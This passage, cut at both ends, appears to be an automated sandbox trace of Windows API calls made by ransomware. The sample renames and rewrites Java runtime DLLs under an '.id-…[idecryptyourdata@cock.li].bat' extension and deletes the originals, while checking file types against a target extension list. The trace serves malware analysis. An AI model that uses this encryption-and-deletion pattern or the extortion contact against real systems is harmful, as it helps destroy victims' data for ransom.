(hObject=0x3a8) returned 1 [0197.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.945] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll")) returned 1 [0197.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.945] lstrlenW (lpString=".doc") returned 4 [0197.945] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.945] lstrlenW (lpString=".docx") returned 5 [0197.945] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0197.945] lstrlenW (lpString=".pdf") returned 4 [0197.945] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString=".xls") returned 4 [0197.946] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString=".xlsx") returned 5 [0197.946] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0197.946] lstrlenW (lpString=".ppt") returned 4 [0197.946] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.946] lstrlenW (lpString=".zip") returned 4 [0197.946] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString=".rar") returned 4 [0197.946] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString=".bz2") returned 4 [0197.946] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.946] lstrlenW (lpString=".7z") returned 3 [0197.946] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.946] lstrlenW (lpString=".dbf") returned 4 [0197.946] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.946] lstrlenW (lpString=".1cd") returned 4 [0197.946] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.946] lstrlenW (lpString=".jpg") returned 4 [0197.946] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.946] lstrlenW (lpString=".doc") returned 4 [0197.946] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.946] lstrlenW (lpString=".docx") returned 5 [0197.947] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0197.947] lstrlenW (lpString=".pdf") returned 4 [0197.947] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.947] lstrlenW (lpString=".xls") returned 4 [0197.947] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.947] lstrlenW (lpString=".xlsx") returned 5 [0197.947] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0197.947] lstrlenW (lpString=".ppt") returned 4 [0197.947] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.947] lstrlenW (lpString=".zip") returned 4 [0197.947] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.947] lstrlenW (lpString=".rar") returned 4 [0197.947] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.947] lstrlenW (lpString=".bz2") returned 4 [0197.947] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.947] lstrlenW (lpString=".7z") returned 3 [0197.947] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.947] lstrlenW (lpString=".dbf") returned 4 [0197.947] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.947] lstrlenW (lpString=".1cd") returned 4 [0197.947] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 53 [0197.947] lstrlenW (lpString=".jpg") returned 4 [0197.947] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.948] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.948] lstrlenW (lpString="msvcp120.dll") returned 12 [0197.948] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.948] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=660128) returned 1 [0197.948] CloseHandle (hObject=0x3a8) returned 1 [0197.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll")) returned 0x20 [0197.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.949] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.949] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.949] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.949] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.949] GetLastError () returned 0x0 [0197.949] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xa12a0, lpOverlapped=0x0) returned 1 [0198.363] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xa12b0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xa12b0, lpOverlapped=0x0) returned 1 [0198.384] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.385] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.385] SetEndOfFile (hFile=0x35c) returned 1 [0198.385] CloseHandle (hObject=0x35c) returned 1 [0198.385] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.385] SetEndOfFile (hFile=0x3a8) returned 1 [0198.391] CloseHandle (hObject=0x3a8) returned 1 [0198.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.392] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll")) returned 1 [0198.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.392] lstrlenW (lpString=".doc") returned 4 [0198.392] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.392] lstrlenW (lpString=".docx") returned 5 [0198.392] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0198.392] lstrlenW (lpString=".pdf") returned 4 [0198.392] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.392] lstrlenW (lpString=".xls") returned 4 [0198.392] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.392] lstrlenW (lpString=".xlsx") returned 5 [0198.392] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0198.392] lstrlenW (lpString=".ppt") returned 4 [0198.392] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.392] lstrlenW (lpString=".zip") returned 4 [0198.393] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.393] lstrlenW (lpString=".rar") returned 4 [0198.393] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.393] lstrlenW (lpString=".bz2") returned 4 [0198.393] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.393] lstrlenW (lpString=".7z") returned 3 [0198.393] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.393] lstrlenW (lpString=".dbf") returned 4 [0198.393] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.393] lstrlenW (lpString=".1cd") returned 4 [0198.393] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.393] lstrlenW (lpString=".jpg") returned 4 [0198.393] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.393] lstrlenW (lpString=".doc") returned 4 [0198.393] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.393] lstrlenW (lpString=".docx") returned 5 [0198.393] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0198.393] lstrlenW (lpString=".pdf") returned 4 [0198.393] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.393] lstrlenW (lpString=".xls") returned 4 [0198.393] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.677] lstrlenW (lpString=".xlsx") returned 5 [0198.677] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0198.677] lstrlenW (lpString=".ppt") returned 4 [0198.677] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.677] lstrlenW (lpString=".zip") returned 4 [0198.677] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.677] lstrlenW (lpString=".rar") returned 4 [0198.677] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.677] lstrlenW (lpString=".bz2") returned 4 [0198.677] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.677] lstrlenW (lpString=".7z") returned 3 [0198.677] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.677] lstrlenW (lpString=".dbf") returned 4 [0198.677] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.677] lstrlenW (lpString=".1cd") returned 4 [0198.677] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 51 [0198.677] lstrlenW (lpString=".jpg") returned 4 [0198.677] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.677] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.677] lstrlenW (lpString="prism_d3d.dll") returned 13 [0198.677] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.911] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=130624) returned 1 [0198.911] CloseHandle (hObject=0x334) returned 1 [0198.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll")) returned 0x20 [0198.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.911] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.911] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0198.911] GetLastError () returned 0x0 [0198.912] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x1fe40, lpOverlapped=0x0) returned 1 [0198.928] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x1fe50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x1fe50, lpOverlapped=0x0) returned 1 [0198.930] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.930] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xee, lpOverlapped=0x0) returned 1 [0198.930] SetEndOfFile (hFile=0x360) returned 1 [0198.931] CloseHandle (hObject=0x360) returned 1 [0198.931] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.931] SetEndOfFile (hFile=0x334) returned 1 [0198.932] CloseHandle (hObject=0x334) returned 1 [0198.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.932] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll")) returned 1 [0198.932] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.932] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.932] lstrlenW (lpString=".doc") returned 4 [0198.933] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString=".docx") returned 5 [0198.933] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0198.933] lstrlenW (lpString=".pdf") returned 4 [0198.933] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString=".xls") returned 4 [0198.933] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString=".xlsx") returned 5 [0198.933] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0198.933] lstrlenW (lpString=".ppt") returned 4 [0198.933] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.933] lstrlenW (lpString=".zip") returned 4 [0198.933] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString=".rar") returned 4 [0198.933] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString=".bz2") returned 4 [0198.933] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.933] lstrlenW (lpString=".7z") returned 3 [0198.933] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.933] lstrlenW (lpString=".dbf") returned 4 [0198.933] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.933] lstrlenW (lpString=".1cd") returned 4 [0198.933] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.933] lstrlenW (lpString=".jpg") returned 4 [0198.933] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.933] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.933] lstrlenW (lpString=".doc") returned 4 [0198.933] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.934] lstrlenW (lpString=".docx") returned 5 [0198.934] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0198.934] lstrlenW (lpString=".pdf") returned 4 [0198.934] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.934] lstrlenW (lpString=".xls") returned 4 [0198.934] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.934] lstrlenW (lpString=".xlsx") returned 5 [0198.934] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0198.934] lstrlenW (lpString=".ppt") returned 4 [0198.934] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.934] lstrlenW (lpString=".zip") returned 4 [0198.934] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.934] lstrlenW (lpString=".rar") returned 4 [0198.934] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.934] lstrlenW (lpString=".bz2") returned 4 [0198.934] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.934] lstrlenW (lpString=".7z") returned 3 [0198.934] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.934] lstrlenW (lpString=".dbf") returned 4 [0198.934] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.934] lstrlenW (lpString=".1cd") returned 4 [0198.934] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 52 [0198.934] lstrlenW (lpString=".jpg") returned 4 [0198.934] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.934] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.935] lstrlenW (lpString="prism_sw.dll") returned 12 [0198.935] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.935] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=97856) returned 1 [0198.935] CloseHandle (hObject=0x334) returned 1 [0198.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll")) returned 0x20 [0198.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.935] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.935] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.935] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0198.936] GetLastError () returned 0x0 [0198.936] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x17e40, lpOverlapped=0x0) returned 1 [0198.941] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x17e50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x17e50, lpOverlapped=0x0) returned 1 [0198.942] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.943] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.943] SetEndOfFile (hFile=0x360) returned 1 [0198.943] CloseHandle (hObject=0x360) returned 1 [0198.943] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.943] SetEndOfFile (hFile=0x334) returned 1 [0198.944] CloseHandle (hObject=0x334) returned 1 [0198.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.945] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll")) returned 1 [0198.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.945] lstrlenW (lpString=".doc") returned 4 [0198.945] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.945] lstrlenW (lpString=".docx") returned 5 [0198.945] lstrcmpiW (lpString1=".docx", lpString2="w.dll") returned -1 [0198.945] lstrlenW (lpString=".pdf") returned 4 [0198.945] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.945] lstrlenW (lpString=".xls") returned 4 [0198.945] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.945] lstrlenW (lpString=".xlsx") returned 5 [0198.945] lstrcmpiW (lpString1=".xlsx", lpString2="w.dll") returned -1 [0198.945] lstrlenW (lpString=".ppt") returned 4 [0198.945] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.945] lstrlenW (lpString=".zip") returned 4 [0198.945] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.945] lstrlenW (lpString=".rar") returned 4 [0198.945] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.945] lstrlenW (lpString=".bz2") returned 4 [0198.945] lstrcmpiW (lpString1=".bz2", lpString2=".dll") 